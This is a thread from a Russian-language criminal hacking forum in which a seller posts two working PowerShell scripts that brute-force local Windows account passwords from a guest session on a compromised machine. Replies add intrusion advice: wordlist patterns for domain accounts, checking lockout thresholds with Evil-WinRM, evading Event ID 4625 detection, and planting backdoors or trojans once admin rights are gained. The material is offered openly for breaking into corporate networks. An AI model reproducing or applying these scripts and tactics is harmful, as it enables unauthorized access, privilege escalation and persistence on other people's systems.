• XSS.stack #1 – первый литературный журнал от юзеров форума

Локальный брут/Local brute

MrBang

(L3) cache
Seller
Регистрация
11.09.2023
Сообщения
266
Реакции
93
Гарант сделки
7
1005x558_20180704173248b3636157a5.jpg


Оооо, Морти ик, посмотри на это, Морти! Видишь этот код, да? Это, ик, это не просто код, это магия хакинга, Морти! ик Ты видишь? Мы сейчас подбираем локальный пароль, прямо как ик настоящие хакеры, Морти! Ты чувствуешь это в воздухе? Это запах... ик... успеха, Морти!

Вот этот цикл, Морти, ик он перебирает пароли один за другим, как жадный компьютерный гремлин! Ты видишь, как он работает, Морти? Это — наша ик надежда пробраться через эти защитные барьеры. Вжух — и готово! ик Мы обманули систему!

И вот эта строка кода, Морти, ты видишь? Это ик момент истины. Мы отправляем команду, и когда находим пароль... БУМ! ик Всё, Морти, мы внутри! Мы боги киберпространства, Морти! ик

Ooooh, Morty burp, look at this, Morty! You see this code? Yeah? It's not just any code, it's burp hacking magic, Morty! You see it? We're brute-forcing a local password right now, just like real burp hackers, Morty! Can you feel it in the air? That's the smell of... burp... success, Morty!

Look at this loop, Morty! burp It's cycling through passwords one by one, like some greedy little computer gremlin! You see how it's working, Morty? This is our burp ticket into those secure walls. One swoosh—and bam! burp We've tricked the system!

And this line of code, Morty, you see that? This is the burp moment of truth. We send the command, and when we hit the right password... BOOM! burp We're in, Morty! We're cyber gods, Morty! burp


Код:
#powershell
$filePath = "pswd.txt"

$successFilePath = "success.txt"

$networkResource = "\\127.0.0.1"

$passwords = Get-Content $filePath

foreach ($password in $passwords) {
   
    $command = "net use $networkResource /user:DOMAIN\USERNAME ""$password"""
    try {
        $output = Invoke-Expression $command
       
        if ($output -like "*The command completed successfully.*") {
           
            $password | Out-File $successFilePath -Encoding UTF8
            Write-Host "$password"
            break
        }
    }finally {
       
        Invoke-Expression "net use $networkResource /delete"
    }
}
 
Последнее редактирование:
Ты как протрезвеешь напиши по существу, какое количество паролей в минуту оно способно проверить?)
Сколько тысяч лет надо ждать чтобы проверить 100 хостов на средний словарик?
 
Ты как протрезвеешь напиши по существу, какое количество паролей в минуту оно способно проверить?)
Сколько тысяч лет надо ждать чтобы проверить 100 хостов на средний словарик?
ну конкретно у меня на пк, 2500 пассов в минуту.
по поводу хостов не понял вопроса.
 
ладно ладно burp, знаю что вы нанесытные сосисоны, 7500 в минуту.

Код:
$filePath = "1.txt"

$successFilePath = "success.txt"

$user = "Admin"

Add-Type -AssemblyName System.DirectoryServices.AccountManagement

$t = [System.DirectoryServices.AccountManagement.ContextType]::Machine
$context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($t)

$passwords = Get-Content $filePath

foreach ($password in $passwords) {
    $isValid = $context.ValidateCredentials($user, $password)
    if ($isValid) {
        $password | Out-File $successFilePath -Encoding UTF8
        Write-Host "The command completed successfully!: $password"
        break
    }
}
 
ну конкретно у меня на пк, 2500 пассов в минуту.
по поводу хостов не понял вопроса.
у тебя на Пк... Не понял про хосты.
Тоесть ты уже внутри машины и зачем-то брутишь ЛА?)
Брут локалки нужен искючительно когда ты в периметре, но нет ни одного ЛА. И тогда ты ставишь 10-50-100 хостов в брут локал.

В чем прикол брутить то где ты уже есть)
 
у тебя на Пк... Не понял про хосты.
Тоесть ты уже внутри машины и зачем-то брутишь ЛА?)
Брут локалки нужен искючительно когда ты в периметре, но нет ни одного ЛА. И тогда ты ставишь 10-50-100 хостов в брут локал.

В чем прикол брутить то где ты уже есть)
дафига дел сделаешь в юзере, или в госте?)
а если ещё стоит авер)
 
у тебя на Пк... Не понял про хосты.
Тоесть ты уже внутри машины и зачем-то брутишь ЛА?)
Брут локалки нужен искючительно когда ты в периметре, но нет ни одного ЛА. И тогда ты ставишь 10-50-100 хостов в брут локал.

В чем прикол брутить то где ты уже есть)
суть в том что если у тебя локальная админ учетка или юзерская учетка, ты в домене, ты можешь внутри хоста подбирать пасс к нужной учетке. как я понял)
если нет никакой учетки и просто дрочишь хосты учетки с дампа гейта или т.д. это старый добрый NL Брут / msf smb_login
 
ты можешь внутри хоста подбирать пасс к нужной учетке. как я понял)
Не можешь в домене, за подбор доменных учеток там летит бан, брутить только ЛА можно спокойно.


дафига дел сделаешь в юзере, или в госте?)
понял, мертвый случай, такое просто выбрасываю)
 
суть в том что если у тебя локальная админ учетка или юзерская учетка, ты в домене, ты можешь внутри хоста подбирать пасс к нужной учетке. как я понял)
если нет никакой учетки и просто дрочишь хосты учетки с дампа гейта или т.д. это старый добрый NL Брут / msf smb_login
ну я тестил конкретно на госте, зашел, скрытно запустил и забыл, оно себе в тихую брутит пока ты чаи гоняешь, баны не ловишь, а вот если пробовать извне подключаться к тому же RDP то бан ты быстро сможешь поймать если админ норм.
Я лишь поделился тем что нашел, мало ли кому пригодится =)
П.С. если у кого есть rdp_password.txt популярные буду благодарен, побручу из под гостя)
 
П.С. если у кого есть rdp_password.txt популярные буду благодарен, побручу из под гостя)
Думаю время популярных подборок рдп_пассворд ушло в закат в году так 15-16.. Популярные пассы до того время - залетали из-за сборок Hyper-V, ESXi и т.д. Достаточно было посмотреть несколько актуальных курсов по виртуализации от майкрософт тим и подобных. По этим шаблонам в 50%+ случаев админы и собирали сети включая логины и пассы.. Были б тогда тутошние мозги так скажем))
 
П.С. если у кого есть rdp_password.txt популярные буду благодарен, побручу из под гостя)
Дополню, если брутить доменную учетку, это популярные логины в АД + пароли типа Welcome+актнуальный_год и популярные приставки, названия команд нхл, бейсбол и т.д.+актуальный год, и популярные приставки.
Естественно гуглишь домен, полное имя компании, смотришь деятельность и набрасываешь всевозможные вариации департаментов в сфере, и играешься уже с этими данными
 
В первую очередь нужно чекнуть:

Код:
*Evil-WinRM* PS C:\Users\***\Documents> net accounts
Minimum password length:                              7
Lockout threshold:                                    Never

и убрать неподходящие по длинне пароли, так же убедиться что ты не залочишь аккаунт. Ну и конечно же нужно понимать что в Ивентах вы светитесь как Event ID 4625 "An account failed to log on" так что если там админ не подпивас или есть блютим вас вычислят очень быстро.
Имхо брут корпы = убиство доступа.
 
Имхо брут корпы = убиство доступа.
есть варианты "совершения действий" с подтверждением авторизации, условно скопирывать что-то с одного места в другое сделав это под определенной учеткой. реализовать можно как и с "сетевыми инстурментами" так и внутри хоста, просто выполнение команды, а куда и под каким вариантом скопируется это и будет гудом. это не детектится еще, вроде..
🤔

но, в целом согласен.
 
В первую очередь нужно чекнуть:

Код:
*Evil-WinRM* PS C:\Users\***\Documents> net accounts
Minimum password length:                              7
Lockout threshold:                                    Never

и убрать неподходящие по длинне пароли, так же убедиться что ты не залочишь аккаунт. Ну и конечно же нужно понимать что в Ивентах вы светитесь как Event ID 4625 "An account failed to log on" так что если там админ не подпивас или есть блютим вас вычислят очень быстро.
Имхо брут корпы = убиство доступа.
так то я понимаю, что если админ не лох лох не админ, то там конечно будет блок.
НО нужно понимать, мы это всё дело делаем под ГОСТЕМ, где условно у нас и так нихера нет))
Как говорится, если чо не велика потеря, НО если мы успеем получить админ права, то можно уже и подшустрить, оставить бэкдор и тд, да даже трой впилить можно из под гостя в другую учётку.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх